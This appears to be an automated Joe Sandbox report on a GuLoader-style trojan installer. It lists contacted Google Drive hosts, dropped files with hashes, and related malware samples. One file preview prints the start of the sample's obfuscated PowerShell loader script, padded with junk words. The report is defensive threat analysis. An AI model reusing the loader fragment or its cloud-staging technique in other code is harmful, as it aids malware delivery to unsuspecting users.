C:\Users\user\AppData\Local\Temp\syrians.exe	61%	Virustotal		Browse

Name	IP	Active	Malicious	Reputation
drive.google.com	142.250.186.174	true	false	high
drive.usercontent.google.com	142.250.186.33	true	false	high
15.164.165.52.in-addr.arpa	unknown	unknown	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://www.google.com	syrians.exe, 00000008.00000003.3346992730.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3301717329.0000000005A38000.00000004.00000020.00020000.00000000.sdmp	false	high
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	syrians.exe, 00000008.00000001.2843443692.00000000005F2000.00000020.00000001.01000000.00000007.sdmp	false	high
https://translate.google.com/translate_a/element.js	syrians.exe, 00000008.00000003.3104143779.0000000005A26000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3357914515.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3161725858.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3313067591.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3279283600.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3069511457.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3139330187.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.2943166139.0000000005A3D000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3093058995.0000000005A26000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3279222066.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.2988754427.0000000005A15000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3011677797.0000000005A28000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3116395498.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3034385519.0000000005A28000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3104143779.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3034385519.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3313005550.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3184099773.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.2931809139.0000000005A3F000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3081539793.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3057211301.0000000005A20000.00000004.00000020.00020000.00000000.sdmp	false	high
https://drive.google.com/w	syrians.exe, 00000008.00000003.3240199604.0000000005A3E000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3279222066.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3290217008.0000000005A3C000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3313005550.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3290162505.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3279254655.0000000005A3C000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3229363226.0000000005A3E000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3069167737.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3301717329.0000000005A38000.00000004.00000020.00020000.00000000.sdmp	false	high
https://drive.google.com/	syrians.exe, 00000008.00000003.3369585078.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3046064176.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3000483871.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000002.3380721457.00000000059C8000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3313067591.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3011741668.0000000005A3D000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3104143779.0000000005A16000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3335326380.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.2988754427.0000000005A15000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3034255260.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3023539797.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3357914515.0000000005A16000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3011629852.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3313005550.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3069511457.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.2955334493.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3346955212.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3093058995.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3081539793.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.2977951666.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000002.3380721457.0000000005A02000.00000004.00000020.00020000.00000000.sdmp	false	high
https://drive.google.com/ertificates	syrians.exe, 00000008.00000003.3046064176.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3034385519.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3023589764.0000000005A14000.00000004.00000020.00020000.00000000.sdmp	false	high
https://drive.google.com/t	syrians.exe, 00000008.00000003.3000483871.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3023589764.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3011677797.0000000005A16000.00000004.00000020.00020000.00000000.sdmp	false	high
https://drive.google.com/r	syrians.exe, 00000008.00000003.3369526042.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3346955212.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3357877534.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000002.3380721457.0000000005A38000.00000004.00000020.00020000.00000000.sdmp	false	high
https://drive.usercontent.google.com/e	syrians.exe, 00000008.00000002.3380721457.0000000005A38000.00000004.00000020.00020000.00000000.sdmp	false	high
https://drive.google.com/1	syrians.exe, 00000008.00000002.3380721457.00000000059C8000.00000004.00000020.00020000.00000000.sdmp	false	high
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214	syrians.exe, 00000008.00000001.2843443692.0000000000649000.00000020.00000001.01000000.00000007.sdmp	false	high
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd	syrians.exe, 00000008.00000001.2843443692.00000000005F2000.00000020.00000001.01000000.00000007.sdmp	false	high
http://www.ftp.ftp://ftp.gopher.	syrians.exe, 00000008.00000001.2843443692.0000000000649000.00000020.00000001.01000000.00000007.sdmp	false	high
https://drive.usercontent.google.com/	syrians.exe, 00000008.00000003.3240199604.0000000005A3E000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3161725858.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3127682738.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3011741668.0000000005A3D000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.2943166139.0000000005A3D000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3116259832.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3279222066.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3290217008.0000000005A3C000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3034255260.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3369526042.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3093015964.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3023539797.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3184162821.0000000005A3C000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3011629852.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3313005550.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3184099773.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3251750304.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3217375762.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3346955212.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3172628532.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3104081791.0000000005A38000.00000004.00000020.00020000.00000000.sdmp	false	high
https://drive.google.com/t0	syrians.exe, 00000008.00000003.3000483871.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.2988754427.0000000005A15000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.2955334493.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.2977951666.0000000005A14000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.2966271594.0000000005A14000.00000004.00000020.00020000.00000000.sdmp	false	high
https://apis.google.com	syrians.exe, 00000008.00000003.3346992730.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3301717329.0000000005A38000.00000004.00000020.00020000.00000000.sdmp	false	high
http://nsis.sf.net/NSIS_ErrorError	7uY105UTJU.exe, syrians.exe.2.dr	false	high
https://drive.google.com/rg	syrians.exe, 00000008.00000003.3011741668.0000000005A3D000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3011629852.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3335257821.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3000456250.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3324480588.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.2977912843.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.3000550258.0000000005A3D000.00000004.00000020.00020000.00000000.sdmp, syrians.exe, 00000008.00000003.2988720615.0000000005A38000.00000004.00000020.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
142.250.186.174	drive.google.com	United States		15169	GOOGLEUS	false
142.250.186.33	drive.usercontent.google.com	United States		15169	GOOGLEUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588757
Start date and time:	2025-01-11 05:07:38 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 49s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	7uY105UTJU.exe renamed because original name is a hash value
Original Sample Name:	259018c94d2704ea14bd29e2555a2ab62c278160c81ac824a372a7966565d5a2.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@6/13@3/2
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 99% Number of executed functions: 36 Number of non-executed functions: 31
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.175.87.197, 52.165.164.15, 4.245.163.56
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
23:08:31	API Interceptor	43x Sleep call for process: powershell.exe modified
23:09:51	API Interceptor	19x Sleep call for process: syrians.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	QNuQ5e175D.exe	Get hash	malicious	GuLoader	Browse	142.250.186.33 142.250.186.174
	iwEnYIOol8.exe	Get hash	malicious	FormBook, GuLoader	Browse	142.250.186.33 142.250.186.174
	Ntwph4urc1.exe	Get hash	malicious	FormBook, GuLoader	Browse	142.250.186.33 142.250.186.174
	2976587-987347589.07.exe	Get hash	malicious	Nitol, Xmrig	Browse	142.250.186.33 142.250.186.174
	2976587-987347589.08.exe	Get hash	malicious	Nitol	Browse	142.250.186.33 142.250.186.174
	Ntwph4urc1.exe	Get hash	malicious	FormBook, GuLoader	Browse	142.250.186.33 142.250.186.174
	2976587-987347589.08.exe	Get hash	malicious	Unknown	Browse	142.250.186.33 142.250.186.174
	yMXFgPOdf2.exe	Get hash	malicious	GuLoader	Browse	142.250.186.33 142.250.186.174
	2976587-987347589.07.exe	Get hash	malicious	Unknown	Browse	142.250.186.33 142.250.186.174
	yMXFgPOdf2.exe	Get hash	malicious	GuLoader	Browse	142.250.186.33 142.250.186.174

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsr144.tmp\nsExec.dll	iwEnYIOol8.exe	Get hash	malicious	FormBook, GuLoader	Browse
	678763_PDF.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
	file.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Shipping documents 000022999878999800009999.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	Ze1Ueabtx5.img	Get hash	malicious	AgentTesla, GuLoader	Browse
	Documenti di spedizione 0009333000459595995.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	4hIPvzV6a2.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exe	Get hash	malicious	Unknown	Browse
	3Dut8dFCwD.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	53158
Entropy (8bit):	5.062687652912555
Encrypted:	false
SSDEEP:	1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
MD5:	5D430F1344CE89737902AEC47C61C930
SHA1:	0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
SHA-256:	395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
SHA-512:	DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jynfofba.l0x.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ojigbynz.ka3.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u02odyfs.1er.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yikift03.cmb.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\nsr144.tmp\nsExec.dll

Download File

Process:	C:\Users\user\Desktop\7uY105UTJU.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	7168
Entropy (8bit):	5.2959870663251625
Encrypted:	false
SSDEEP:	96:JwzdzBzMDhOZZDbXf5GsWvSv1ckne94SDbYkvML1HT1fUNQaSGYuH0DQ:JTQHDb2vSuOc41ZfUNQZGdHM
MD5:	B4579BC396ACE8CAFD9E825FF63FE244
SHA1:	32A87ED28A510E3B3C06A451D1F3D0BA9FAF8D9C
SHA-256:	01E72332362345C415A7EDCB366D6A1B52BE9AC6E946FB9DA49785C140BA1A4B
SHA-512:	3A76E0E259A0CA12275FED922CE6E01BDFD9E33BA85973E80101B8025EF9243F5E32461A113BBCC6AA75E40894BB5D3A42D6B21045517B6B3CF12D76B4CFA36A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: iwEnYIOol8.exe, Detection: malicious, Browse Filename: 678763_PDF.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: Shipping documents 000022999878999800009999.exe, Detection: malicious, Browse Filename: Ze1Ueabtx5.img, Detection: malicious, Browse Filename: Documenti di spedizione 0009333000459595995.exe, Detection: malicious, Browse Filename: 4hIPvzV6a2.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exe, Detection: malicious, Browse Filename: 3Dut8dFCwD.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........................PE..L...Q.d...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\syrians.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	724035
Entropy (8bit):	7.812999334605571
Encrypted:	false
SSDEEP:	12288:IfL/UfibuwTL89Y2deIT6q5ap7kd4tC04wL9tKlQyYefZKSxA340ryKhz:IfL8fibuw09zrpapgd48rwL9tjexKj3v
MD5:	81EE208A058EFEBDDABD4F78FFF047D0
SHA1:	B5855BDFBB89A50BEC871EE72D675063F9B49183
SHA-256:	259018C94D2704EA14BD29E2555A2AB62C278160C81AC824A372A7966565D5A2
SHA-512:	7910D83FB7224E2030BA016500193272637A0F5D9647B333EAEBD3DE74A04466CD074F6214E0CD2098681DA1C2C818A5BE966E86145644AF9DC6C4A37E6C43FF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50% Antivirus: Virustotal, Detection: 61%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN._...PN..PO.JPN._...PN.s~..PN..VH..PN.Rich.PN.........................PE..L...l.d.................j..........25............@.......................................@..........................................@...k...........................................................................................................text....h.......j.................. ..`.rdata..d............n..............@..@.data...............................@....ndata.......P...........................rsrc....k...@...l..................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\syrians.exe:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\erstatningsgraden\Successively.Ton

Download File

Process:	C:\Users\user\Desktop\7uY105UTJU.exe
File Type:	Unicode text, UTF-8 text, with very long lines (4247), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	70001
Entropy (8bit):	5.202264758081976
Encrypted:	false
SSDEEP:	1536:r+IKeaF9uX00pLmKlUqWQcbN3B8WleG6QVtRwEd:rJKX9vUxUqW7bNiU60HwEd
MD5:	F200A5DEDF1B71FB7C0320730FCF86A2
SHA1:	80906B8E3542E1EEB1314E86B0F2BA33CFDC63C9
SHA-256:	DDB649D987F1B6052027FABF7CA156A7865B8DDF7F547AF533247FDDA39A32D9
SHA-512:	23B41401E31932D263AA1E94CC2CC7C0CC790DB50B7D3989B102D9FA44F7B9EF98DA6A3F9A879FC7A1DB9C0A4B233900B17FC14098D25CDF39990B9A34389B69
Malicious:	true
Preview:	$Cynipoid=$Fretworked5;.....<#Wastabl Tykmlksskaalens sheriffess #>..<#Mimikers Helligdommenes Tilfredsheder Accumb Ritmestrene Spaankurvenes Fladstjerne #>..<#Intollerably Rdbyeren Omnormeringerne flerbrugerudgavers Brorens Norby Autorulning #>..<#Postflexion Dronningeportrtter Hegemon #>..<#Lyonnais Indianerhvding Reincorporation #>..<#Selfheal Assidean Renselsesfesterne sminkrerne Houndy #>...$Garbanzos = @'.Kriderp.U majes$ MagistOSag regpAfsvkkerSyr rerrConvicteravenhonRubinereUnrepea1Immunek6Remissi5GulteccuKv rtetsHappe,itTyngdeplMitisdriP ulasanimbric,ghenle.e= Dism,n$SaccharSAltiscotTrokledicoplottvdilemmie kondicl Tra,pesovertrdeHu keferambusca; F,bela.Operat.f Th.ndeuSkrmtv n Fagbevc ParacotSerie,yiC ntrifothyrotonSkalpej Stenkula Diab tdOv,rwheogrumpsbpKnipspetZirconyiIndv,ndv nderskfalliereaDerm,tod Ass vee .afterrBebrejdeVagrantnKalkerssReallot Linieso( Barfyf$SammentNB kidnoasuccincvStudiesnDeprivagFladssbiBlears vRunesteemi tune, Multif$Fu dstnOBelatf.pSeisesmrOverlegr

C:\Users\user\AppData\Roaming\erstatningsgraden\Ubekymret\storfavoritters.tid

Download File

Process:	C:\Users\user\Desktop\7uY105UTJU.exe
File Type:	data
Category:	dropped
Size (bytes):	495136
Entropy (8bit):	1.2514913232658866
Encrypted:	false
SSDEEP:	1536:jfLDH9Jx2uiEaWIwEfM+5EUPDohS/uF1bXyCOAqRu:TsIaV+CDTuF1bizAT
MD5:	F28B6FB0CA8AF14D2913C43CBEA08754
SHA1:	0BA129FCFA0131A4EFCDF2B1952F4FAE59604720
SHA-256:	F1C35573809F92DC65D2EB2EBC3CD9D0C78E75E73ED741E52BAECAE2FC02DD70
SHA-512:	523F6E0A8E879F13AB9D7BAE0E7A7E0157ABB0A8B1240F0EC0B5FF84C26A3F1519535DFAD9170BC6E887AE70DE03B939148D629695DB71DC53DF5A75AC2E2757
Malicious:	false
Preview:	...n.............................Y.....................!.......j.........[...............R................+.........M............................................................=..........................................................j....g.......9..........................&....................................s.......................x.......{............-............................................V......................u......................................................................................F.........y..................V.............\.......................`....................]..........e.......1.........6.......M................+...................................S...e..............................................g..........................Z.....26............C...&...............................................-...................................................................)..................................................................................G......

C:\Users\user\AppData\Roaming\erstatningsgraden\Unlatches.Vel

Download File

Process:	C:\Users\user\Desktop\7uY105UTJU.exe
File Type:	data
Category:	dropped
Size (bytes):	335274
Entropy (8bit):	7.606316489189455
Encrypted:	false
SSDEEP:	6144:CAygSs29RXf8KTqyuyYZdt1Dfq4XXMYcWlogNiy:CtgELP1qynYdx++ogD
MD5:	D38759CF2FE7743161740414AF4DB1F6
SHA1:	5BAEF5ED78CFA7D82B9E416E6E53536B27E0C060
SHA-256:	A6B47EA5FAB45625DE71C506F065B74555CBBDBA9A394382C4EB473D863279A4
SHA-512:	7E88402DFA2C2F43F86401BF0A3FD4F014F4FC3E7F09867A12C5B67EFB04359874C30906377E4C280C007D0829895EB301C264E1F20F88226EBA239F7236C56E
Malicious:	false
